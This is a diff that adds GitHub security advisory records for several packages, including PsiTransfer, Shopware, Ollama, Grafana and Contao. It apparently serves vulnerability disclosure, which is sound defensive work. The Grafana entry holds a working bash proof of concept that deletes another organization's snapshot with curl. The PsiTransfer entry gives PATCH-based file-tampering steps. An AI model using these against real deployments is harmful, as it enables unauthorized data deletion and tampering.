b/advisories/github-reviewed/2024/03/GHSA-v682-8vv8-vpwr/GHSA-v682-8vv8-vpwr.json index 3775b7ba990..5c8ca938180 100644 --- a/advisories/github-reviewed/2024/03/GHSA-v682-8vv8-vpwr/GHSA-v682-8vv8-vpwr.json +++ b/advisories/github-reviewed/2024/03/GHSA-v682-8vv8-vpwr/GHSA-v682-8vv8-vpwr.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-v682-8vv8-vpwr", - "modified": "2024-04-03T00:30:54Z", + "modified": "2024-04-06T06:31:07Z", "published": "2024-03-13T18:31:34Z", "aliases": [ "CVE-2024-23672" @@ -130,6 +130,10 @@ "type": "WEB", "url": "https://lists.apache.org/thread/cmpswfx6tj4s7x0nxxosvfqs11lvdx2f" }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2024/04/msg00001.html" + }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20240402-0002" diff --git a/advisories/github-reviewed/2024/04/GHSA-2p2x-p7wj-j5h2/GHSA-2p2x-p7wj-j5h2.json b/advisories/github-reviewed/2024/04/GHSA-2p2x-p7wj-j5h2/GHSA-2p2x-p7wj-j5h2.json new file mode 100644 index 00000000000..c54ab04d5c9 --- /dev/null +++ b/advisories/github-reviewed/2024/04/GHSA-2p2x-p7wj-j5h2/GHSA-2p2x-p7wj-j5h2.json @@ -0,0 +1,65 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2p2x-p7wj-j5h2", + "modified": "2024-04-09T18:47:05Z", + "published": "2024-04-05T17:15:27Z", + "aliases": [ + "CVE-2024-31454" + ], + "summary": "PsiTransfer: File integrity violation", + "details": "### Summary\nThe absence of restrictions on the endpoint, which is designed for uploading files, allows an attacker who received the id of a file distribution to change the files that are in this distribution.\n\n### Details\nVulnerable endpoint: PATCH /files/{{id}}\n\n### PoC\n1. Create a file distribution.\n\n2. Go to the link address for downloading files and download the file (in this case, the attacker receives the file id from the download request).\n\n3. Send a PATCH /files/{{id}} request with arbitrary content in the request body.\n\nThus, the file with the specified id will be changed. What the attacker specifies in the body of the request will be added to the end of the original content. In the future, users will download the modified file.\n\n### Impact\nThe vulnerability allows an attacker to influence those users who come to the file distribution after him and slip the victim files with a malicious or phishing signature.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "psitransfer" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2.2.0" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/psi-4ward/psitransfer/security/advisories/GHSA-2p2x-p7wj-j5h2" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-31454" + }, + { + "type": "WEB", + "url": "https://github.com/psi-4ward/psitransfer/commit/0014d81141e0f1664ccb6841970ef1ea0237cca3" + }, + { + "type": "PACKAGE", + "url": "https://github.com/psi-4ward/psitransfer" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-434" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-04-05T17:15:27Z", + "nvd_published_at": "2024-04-09T18:15:10Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/04/GHSA-2v42-xp3j-47m4/GHSA-2v42-xp3j-47m4.json b/advisories/github-reviewed/2024/04/GHSA-2v42-xp3j-47m4/GHSA-2v42-xp3j-47m4.json new file mode 100644 index 00000000000..9150b5061d9 --- /dev/null +++ b/advisories/github-reviewed/2024/04/GHSA-2v42-xp3j-47m4/GHSA-2v42-xp3j-47m4.json @@ -0,0 +1,77 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2v42-xp3j-47m4", + "modified": "2024-04-08T15:42:15Z", + "published": "2024-04-06T12:30:56Z", + "aliases": [ + "CVE-2024-3366" + ], + "summary": "Xuxueli xxl-job template injection vulnerability", + "details": "A vulnerability classified as problematic was found in Xuxueli xxl-job version 2.4.0. This vulnerability affects the function `deserialize` of the file `com/xxl/job/core/util/JdkSerializeTool.java` of the component `Template Handler`. The manipulation leads to injection. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-259480.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "com.xuxueli:xxl-job-core" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "last_affected": "2.4.0" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-3366" + }, + { + "type": "WEB", + "url": "https://github.com/xuxueli/xxl-job/issues/3391" + }, + { + "type": "PACKAGE", + "url": "https://github.com/xuxueli/xxl-job" + }, + { + "type": "WEB", + "url": "https://github.com/xuxueli/xxl-job/blob/761de38a0b2a39706e2008e7914fba13bf4ca184/xxl-job-core/src/main/java/com/xxl/job/core/util/JdkSerializeTool.java#L4" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.259480" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.259480" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.308180" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-74" + ], + "severity": "LOW", + "github_reviewed": true, + "github_reviewed_at": "2024-04-08T15:42:15Z", + "nvd_published_at": "2024-04-06T11:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/04/GHSA-5297-wrrp-rcj7/GHSA-5297-wrrp-rcj7.json b/advisories/github-reviewed/2024/04/GHSA-5297-wrrp-rcj7/GHSA-5297-wrrp-rcj7.json new file mode 100644 index 00000000000..9a06ae8a95e --- /dev/null +++ b/advisories/github-reviewed/2024/04/GHSA-5297-wrrp-rcj7/GHSA-5297-wrrp-rcj7.json @@ -0,0 +1,126 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-5297-wrrp-rcj7", + "modified": "2024-04-08T18:34:00Z", + "published": "2024-04-08T15:48:27Z", + "aliases": [ + "CVE-2024-31447" + ], + "summary": "Shopware Improper Session Handling in store-api account logout", + "details": "### Impact\n\nWhen a authentificated request is made to `POST /store-api/account/logout`, the cart will be cleared, but the User won't be logged out. This affects only the direct store-api usage, as the PHP Storefront listens additionally on `CustomerLogoutEvent` and invalidates the session additionally. \n\n### Patches\nThe problem has been fixed with Shopware 6.6.1.0 and 6.5.8.8.\n\n### Workarounds\nWhen you are not able to update, you can install the latest version of the Shopware Security Plugin.\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:H/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Packagist", + "name": "shopware/core" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "6.3.5.0" + }, + { + "fixed": "6.5.8.8" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "shopware/platform" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "6.3.5.0" + }, + { + "fixed": "6.5.8.8" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "shopware/core" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "6.6.0.0-rc1" + }, + { + "fixed": "6.6.1.0" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "shopware/platform" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "6.6.0.0-rc1" + }, + { + "fixed": "6.6.1.0" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/shopware/shopware/security/advisories/GHSA-5297-wrrp-rcj7" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-31447" + }, + { + "type": "WEB", + "url": "https://github.com/shopware/shopware/commit/5cc84ddd817ad0c1d07f9b3c79ab346d50514a77" + }, + { + "type": "WEB", + "url": "https://github.com/shopware/shopware/commit/d29775aa758f70d08e0c5999795c7c26d230e7d3" + }, + { + "type": "PACKAGE", + "url": "https://github.com/shopware/shopware" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-613" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-04-08T15:48:27Z", + "nvd_published_at": "2024-04-08T16:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/04/GHSA-5gmm-6m36-r7jh/GHSA-5gmm-6m36-r7jh.json b/advisories/github-reviewed/2024/04/GHSA-5gmm-6m36-r7jh/GHSA-5gmm-6m36-r7jh.json new file mode 100644 index 00000000000..9eb1481665a --- /dev/null +++ b/advisories/github-reviewed/2024/04/GHSA-5gmm-6m36-r7jh/GHSA-5gmm-6m36-r7jh.json @@ -0,0 +1,66 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-5gmm-6m36-r7jh", + "modified": "2024-04-05T15:41:34Z", + "published": "2024-04-05T15:41:34Z", + "aliases": [ + + ], + "summary": "transpose: Buffer overflow due to integer overflow", + "details": "Given the function `transpose::transpose`:\n```rust\nfn transpose(input: &[T], output: &mut [T], input_width: usize, input_height: usize)\n```\n\nThe safety check `input_width * input_height == output.len()` can fail due to `input_width * input_height` overflowing in such a way that it equals `output.len()`.\nAs a result of failing the safety check, memory past the end of `output` is written to. This only occurs in release mode since `*` panics on overflow in debug mode.\n\nExploiting this issue requires the caller to pass `input_width` and `input_height` arguments such that multiplying them overflows, and the overflown result equals the lengths of input and output slices.\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "crates.io", + "name": "transpose" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0.1.0" + }, + { + "fixed": "0.2.3" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/ejmahler/transpose/issues/11" + }, + { + "type": "WEB", + "url": "https://github.com/ejmahler/transpose/commit/c4bcd39fabca9a31a401d0cc42d4090869b5a37a" + }, + { + "type": "PACKAGE", + "url": "https://github.com/ejmahler/transpose" + }, + { + "type": "WEB", + "url": "https://rustsec.org/advisories/RUSTSEC-2023-0080.html" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-120", + "CWE-190" + ], + "severity": "CRITICAL", + "github_reviewed": true, + "github_reviewed_at": "2024-04-05T15:41:34Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/04/GHSA-5jx5-hqx5-2vrj/GHSA-5jx5-hqx5-2vrj.json b/advisories/github-reviewed/2024/04/GHSA-5jx5-hqx5-2vrj/GHSA-5jx5-hqx5-2vrj.json new file mode 100644 index 00000000000..d47e989af2a --- /dev/null +++ b/advisories/github-reviewed/2024/04/GHSA-5jx5-hqx5-2vrj/GHSA-5jx5-hqx5-2vrj.json @@ -0,0 +1,70 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-5jx5-hqx5-2vrj", + "modified": "2024-04-08T22:20:11Z", + "published": "2024-04-08T21:31:16Z", + "aliases": [ + "CVE-2024-28224" + ], + "summary": "Ollama DNS rebinding vulnerability", + "details": "Ollama before 0.1.29 has a DNS rebinding vulnerability that can inadvertently allow remote access to the full API, thereby letting an unauthorized user chat with a large language model, delete a model, or cause a denial of service (resource exhaustion).", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Go", + "name": "github.com/ollama/ollama" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "0.1.29" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-28224" + }, + { + "type": "PACKAGE", + "url": "https://github.com/ollama/ollama" + }, + { + "type": "WEB", + "url": "https://github.com/ollama/ollama/releases" + }, + { + "type": "WEB", + "url": "https://research.nccgroup.com/2024/04/08/technical-advisory-ollama-dns-rebinding-attack-cve-2024-28224" + }, + { + "type": "WEB", + "url": "https://www.nccgroup.trust/us/our-research/?research=Technical+advisories" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-290", + "CWE-350" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-04-08T22:20:11Z", + "nvd_published_at": "2024-04-08T19:15:07Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/04/GHSA-6623-c6mr-6737/GHSA-6623-c6mr-6737.json b/advisories/github-reviewed/2024/04/GHSA-6623-c6mr-6737/GHSA-6623-c6mr-6737.json new file mode 100644 index 00000000000..7e0332fe9bc --- /dev/null +++ b/advisories/github-reviewed/2024/04/GHSA-6623-c6mr-6737/GHSA-6623-c6mr-6737.json @@ -0,0 +1,69 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-6623-c6mr-6737", + "modified": "2024-04-09T16:28:05Z", + "published": "2024-04-09T12:30:47Z", + "aliases": [ + "CVE-2024-31862" + ], + "summary": "Apache Zeppelin: Denial of service with invalid notebook name", + "details": "Improper Input Validation vulnerability in Apache Zeppelin when creating a new note from Zeppelin's UI. This issue affects Apache Zeppelin from 0.10.1 before 0.11.0.\n\nUsers are recommended to upgrade to version 0.11.0, which fixes the issue.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.apache.zeppelin:zeppelin-server" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0.10.1" + }, + { + "fixed": "0.11.0" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-31862" + }, + { + "type": "WEB", + "url": "https://github.com/apache/zeppelin/pull/4632" + }, + { + "type": "WEB", + "url": "https://github.com/apache/zeppelin/commit/f025a697c1d1d0264064d5adf6cb0b20d85041b6" + }, + { + "type": "PACKAGE", + "url": "https://github.com/apache/zeppelin" + }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread/73xdjx43yg4yz8bd4p3o8vzyybkysmn0" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-20" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-04-09T16:28:05Z", + "nvd_published_at": "2024-04-09T10:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/04/GHSA-67rv-qpw2-6qrr/GHSA-67rv-qpw2-6qrr.json b/advisories/github-reviewed/2024/04/GHSA-67rv-qpw2-6qrr/GHSA-67rv-qpw2-6qrr.json new file mode 100644 index 00000000000..4ef0d73548b --- /dev/null +++ b/advisories/github-reviewed/2024/04/GHSA-67rv-qpw2-6qrr/GHSA-67rv-qpw2-6qrr.json @@ -0,0 +1,141 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-67rv-qpw2-6qrr", + "modified": "2024-04-05T19:30:52Z", + "published": "2024-04-05T19:29:10Z", + "aliases": [ + "CVE-2024-1313" + ], + "summary": "Grafana: Users outside an organization can delete a snapshot with its key", + "details": "### Summary\nThe ***DELETE /api/snapshots/{key}*** endpoint allows any Grafana user to delete snapshots if the user is NOT in the organization of the snapshot\n\n\n### Details\nAn attacker (a user without organization affiliation or with a \"no basic role\" in an organization other than the one where the dashboard exists), knowing the key or URL of a snapshot created by any user (including Grafana admins), can delete a snapshot (It is not feasible using UI), resulting in a BOLA vulnerability. \nIf an attacker is in the same organization of the dashboard snapshot, he can’t delete the snapshot. However, an attacker with low-privilege from a different organization would be able to delete it, resulting in the authorization flaw. \n\n![Screenshot 2024-01-19 at 3 50 23 PM](https://user-images.githubusercontent.com/58054904/298194695-bea8ab57-8504-4f5d-9468-cef7acf8622b.png)\n\n### Precondition\nTo exploit this endpoint, an attacker must know the {key} of a snapshot. The attacker can potentially discover this key in various ways.\n\nWhen [creating a snapshot through the API](https://grafana.com/docs/grafana/latest/developers/http_api/snapshot/), users can manually specify a key without any complexity requirements. This lack of complexity makes this key susceptible to brute force attacks. For example, simplistic keys such as \"customer_key_123\" or \"admin_snap\" can be easily guessed. These predictable keys allow low-privileged attackers to perform brute-force attacks using common keywords, potentially leading to compromised data integrity.\n\nIn addition, this key is displayed in plain text in the URL of a snapshot. This means that if a user publicly displays a snapshot, viewers might note down the key. Furthermore, since the snapshot feature is often used for sharing, displaying, and backing up data, a low-privileged attacker could potentially find snapshot keys in places like the organization's content management system, messaging platform, or shared documents.\n\n### PoC\n```\n#!/bin/bash -x\n\n# /snapshots/{key}: {'delete': {'success_status_code': 200, 'exec_paths': ['post /snapshots']}}\n# 2d92c726-bf3c-4f20-b979-37bdf81d68c7\n\n# Authentication stage\n\n# User A - Grafana Admin\nuser_a_token=\"YWRtaW46YWRtaW4xMjM=\"\n\n# User B - User with no permissions , which is not part of any org\nuser_b_token=\"YmJiOmJiYmJiYmJiYg==\"\n\n# Create snapshot\ncurrent_date=$(date +%Y-%m-%d-%H-%M-%S)\nrandom_string=\"random-${current_date}\"\nsnapshot_data='{\"dashboard\":{\"annotations\":{\"list\":[{\"name\":\"Annotations & Alerts\",\"enable\":true,\"iconColor\":\"rgba(0, 211, 255, 1)\",\"snapshotData\":[],\"type\":\"dashboard\",\"builtIn\":1,\"hide\":true}]},\"editable\":true,\"fiscalYearStartMonth\":0,\"graphTooltip\":0,\"id\":1517,\"links\":[],\"liveNow\":false,\"panels\":[{\"aliasColors\":{},\"bars\":false,\"dashLength\":10,\"dashes\":false,\"datasource\":null,\"fill\":1,\"fillGradient\":0,\"gridPos\":{\"h\":7,\"w\":24,\"x\":0,\"y\":0},\"hiddenSeries\":false,\"id\":4,\"legend\":{\"alignAsTable\":true,\"avg\":false,\"current\":true,\"max\":false,\"min\":false,\"rightSide\":true,\"show\":true,\"total\":false,\"values\":true},\"lines\":true,\"linewidth\":1,\"links\":[],\"nullPointMode\":\"null\",\"options\":{\"alertThreshold\":true},\"percentage\":false,\"pluginVersion\":\"10.2.3\",\"pointradius\":2,\"points\":false,\"renderer\":\"flot\",\"seriesOverrides\":[],\"snapshotData\":[{\"fields\":[{\"config\":{},\"name\":\"time\",\"type\":\"time\",\"values\":[1704380420234,1704380420334,1704380420434,1704380420534,1704380420634,1704380420734,1704380420834,1704380566535,1704380566635,1704380566735,1704380566835,1704380566935,1704380567035,1704380567135,1704380567235,1704380567335,1704380567435,1704380567535,1704380567635,1704380567735,1704380567835,1704380567935,1704380568035,1704380568135,1704380568235,1704380568335,1704380568435,1704380568535,1704380568635,1704380568735,1704380568835,1704380568935,1704380569035,1704380569135,1704380569235,1704380569335,1704380569435,1704380569535,1704380569635,1704380569735,1704380569835,1704380569935,1704380570035,1704380570135,1704380570235,1704380570335,1704380570435,1704380570535,1704380570635,1704380570735,1704380570835,1704380570935,1704380571035,1704380571135,1704380571235,1704380571335,1704380571435,1704380571535,1704380571635,1704380571735,1704380571835,1704380571935,1704380572035,1704380572135,1704380572235,1704380572335,1704380572435,1704380572535,1704380572635,1704380572735,1704380572835,1704380572935,1704380573035,1704380573135,1704380573235,1704380573335,1704380573435,1704380573535,1704380573635,1704380573735,1704380573835,1704380573935,1704380574035,1704380574135,1704380574235,1704380574335,1704380574435,1704380574535,1704380574635,1704380574735,1704380574835,1704380574935,1704380575035,1704380575135,1704380575235,1704380575335,1704380575435,1704380575535,1704380575635,1704380575735,1704380575835,1704380575935,1704380576035,1704380576135,1704380576235,1704380576335,1704380576435,1704380576535,1704380576635,1704380576735,1704380576835,1704380576935,1704380577035,1704380577135,1704380577235,1704380577335,1704380577435,1704380577535,1704380577635,1704380577735,1704380577835,1704380577935,1704380578035,1704380578135,1704380578235,1704380578335,1704380578435,1704380578535,98.36651881887735,90.90520552302428,100.73967111022498,109.89826524946163,102.00960918579666,106.33530882778683,106.52629457166695,109.56323497328492,116.87832749309237,115.14116509660076,115.70457190523986,118.1091621354617,113.9144753018141,117.58351263310455,117.38409043570634,126.94212224196508,134.50552909930198,127.97490160986311,123.5784401639683,125.31012734609902,118.56171579412602,122.71596068271737,116.11258334902308,118.07532920254557,113.5755959893507,117.02863610131872,122.42991477107806,124.68121765645371,121.45599945829102,120.93643213038477,118.75961398984585,118.70214867496358,116.1085878323934,109.08837112411643,111.90652582288098,109.69360084697551,113.57752983270163,121.0455900847171,116.98257636596624,118.33231004235124,128.19430473604484,119.7539320116394,120.39948913692677,117.05787774775756,109.29564979026497,119.08806090022262,111.20930907183256,104.99629052804383,96.05550719780628,87.99845374253385,83.19203585736912,83.13916797842998,-70.53615047052016,-73.3850420187272]}],\"meta\":{},\"refId\":\"A\"}],\"spaceLength\":10,\"stack\":false,\"steppedLine\":false,\"targets\":[],\"thresholds\":[],\"timeRegions\":[],\"title\":\"Simple dummy streaming example\",\"tooltip\":{\"shared\":true,\"sort\":0,\"value_type\":\"individual\"},\"type\":\"graph\",\"xaxis\":{\"mode\":\"time\",\"show\":true,\"values\":[]},\"yaxes\":[{\"format\":\"short\",\"logBase\":1,\"show\":true},{\"format\":\"short\",\"logBase\":1,\"show\":true}],\"yaxis\":{\"align\":false}}],\"refresh\":\"\",\"schemaVersion\":39,\"snapshot\":{\"timestamp\":\"2024-01-04T15:03:04.128Z\"},\"tags\":[],\"templating\":{\"list\":[]},\"time\":{\"from\":\"2024-01-04T15:02:08.132Z\",\"to\":\"2024-01-04T15:03:08.132Z\",\"raw\":{\"from\":\"now-1m\",\"to\":\"now\"}},\"timepicker\":{\"refresh_intervals\":[\"5s\",\"10s\",\"30s\",\"1m\",\"5m\",\"15m\",\"30m\",\"1h\",\"2h\",\"1d\"],\"time_options\":[\"5m\",\"15m\",\"1h\",\"6h\",\"12h\",\"24h\",\"2d\",\"7d\",\"30d\"]},\"timezone\":\"\",\"title\":\"Simple Streaming Example Snapshot\",\"uid\":\"TXSTREZ\",\"version\":1,\"weekStart\":\"\"},\"name\":\"Simple Streaming Example Snapshot\", \"expires\":0, \"key\":\"admin_key\"}'\n\ncreate_snapshot_response=$(curl -s -X POST \"http://localhost:3000/api/snapshots\" -H \"Authorization: Basic ${user_a_token}\" -H \"Content-Type: application/json\" -d \"${snapshot_data}\")\n\n# Extract key from create snapshot response\nkey=$(echo \"$create_snapshot_response\" | jq -r '.key')\n\n# Delete snapshot\ndelete_snapshot_response=$(curl -s -X DELETE \"http://localhost:3000/api/snapshots/${key}\" -H \"Authorization: Basic ${user_b_token}\" -o /dev/null -w \"%{http_code}\")\n\n# Check if the test passed\nif [ \"$delete_snapshot_response\" -eq 200 ]; then\n echo -e \"\\033[32mTest was passed, BOLA\\033[0m\"\nfi\n\n```\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Go", + "name": "github.com/grafana/grafana" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "9.5.0" + }, + { + "fixed": "9.5.18" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Go", + "name": "github.com/grafana/grafana" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "10.0.0" + }, + { + "fixed": "10.0.13" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Go", + "name": "github.com/grafana/grafana" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "10.1.0" + }, + { + "fixed": "10.1.9" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Go", + "name": "github.com/grafana/grafana" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "10.2.0" + }, + { + "fixed": "10.2.6" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Go", + "name": "github.com/grafana/grafana" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "10.3.0" + }, + { + "fixed": "10.3.5" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/grafana/bugbounty/security/advisories/GHSA-67rv-qpw2-6qrr" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1313" + }, + { + "type": "PACKAGE", + "url": "https://github.com/grafana/grafana" + }, + { + "type": "WEB", + "url": "https://grafana.com/security/security-advisories/cve-2024-1313" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-639" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-04-05T19:29:10Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/04/GHSA-747v-52c4-8vj8/GHSA-747v-52c4-8vj8.json b/advisories/github-reviewed/2024/04/GHSA-747v-52c4-8vj8/GHSA-747v-52c4-8vj8.json new file mode 100644 index 00000000000..859f0962211 --- /dev/null +++ b/advisories/github-reviewed/2024/04/GHSA-747v-52c4-8vj8/GHSA-747v-52c4-8vj8.json @@ -0,0 +1,92 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-747v-52c4-8vj8", + "modified": "2024-04-09T18:52:51Z", + "published": "2024-04-09T18:52:51Z", + "aliases": [ + "CVE-2024-28191" + ], + "summary": "Contao: Unencoded insert tags in the frontend", + "details": "### Impact\n\nIt is possible to inject insert tags via the form generator if the submitted form data is output on the page in a specific way.\n\n### Patches\n\nUpdate to Contao 4.13.40 or 5.3.4.\n\n### Workarounds\n\nDo not output the submitted form data on the website.\n\n### References\n\nhttps://contao.org/en/security-advisories/insert-tag-injection-via-the-form-generator\n\n### For more information\n\nIf you have any questions or comments about this advisory, open an issue in [contao/contao](https://github.com/contao/contao/issues/new/choose).", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Packagist", + "name": "contao/core-bundle" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.0.0" + }, + { + "fixed": "4.13.40" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "contao/core-bundle" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "5.0.0-RC1" + }, + { + "fixed": "5.3.4" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/contao/contao/security/advisories/GHSA-747v-52c4-8vj8" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-28191" + }, + { + "type": "WEB", + "url": "https://github.com/contao/contao/commit/388859dcf110ca70e0fae68a2a5579ab6a702919" + }, + { + "type": "WEB", + "url": "https://github.com/contao/contao/commit/474a2fc25f1d84d786aba8c6d234af99e64d016b" + }, + { + "type": "WEB", + "url": "https://contao.org/en/security-advisories/insert-tag-injection-via-the-form-generator" + }, + { + "type": "PACKAGE", + "url": "https://github.com/contao/contao" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-74" + ], + "severity": "LOW", + "github_reviewed": true, + "github_reviewed_at": "2024-04-09T18:52:51Z", + "nvd_published_at": "2024-04-09T14:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/04/GHSA-9jh5-qf84-x6pr/GHSA-9jh5-qf84-x6pr.json b/advisories/github-reviewed/2024/04/GHSA-9jh5-qf84-x6pr/GHSA-9jh5-qf84-x6pr.json new file mode 100644 index 00000000000..679f81d33e5 --- /dev/null +++ b/advisories/github-reviewed/2024/04/GHSA-9jh5-qf84-x6pr/GHSA-9jh5-qf84-x6pr.json @@ -0,0 +1,96 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9jh5-qf84-x6pr", + "modified": "2024-04-09T21:00:46Z", + "published": "2024-04-09T15:50:59Z", + "aliases": [ + "CVE-2024-28235" + ], + "summary": "Contao: Possible cookie sharing with external domains while checking protected pages for broken links", + "details": "### Impact\n\nIf the crawler is set to crawl protected pages, it sends the cookie header to externals URLs.\n\n### Patches\n\nUpdate to Contao 4.13.40 or 5.3.4.\n\n### Workarounds\n\nDisable crawling protected pages.\n\n### References\n\nhttps://contao.org/en/security-advisories/session-cookie-disclosure-in-the-crawler\n\n### For more information\n\nIf you have any questions or comments about this advisory, open an issue in [contao/contao](https://github.com/contao/contao/issues/new/choose).", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Packagist", + "name": "contao/core-bundle" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.9.0" + }, + { + "fixed": "4.13.40" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "contao/core-bundle" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "5.0.0-RC1" + }, + { + "fixed": "5.3.4" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/contao/contao/security/advisories/GHSA-9jh5-qf84-x6pr" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-28235" + }, + { + "type": "WEB", + "url": 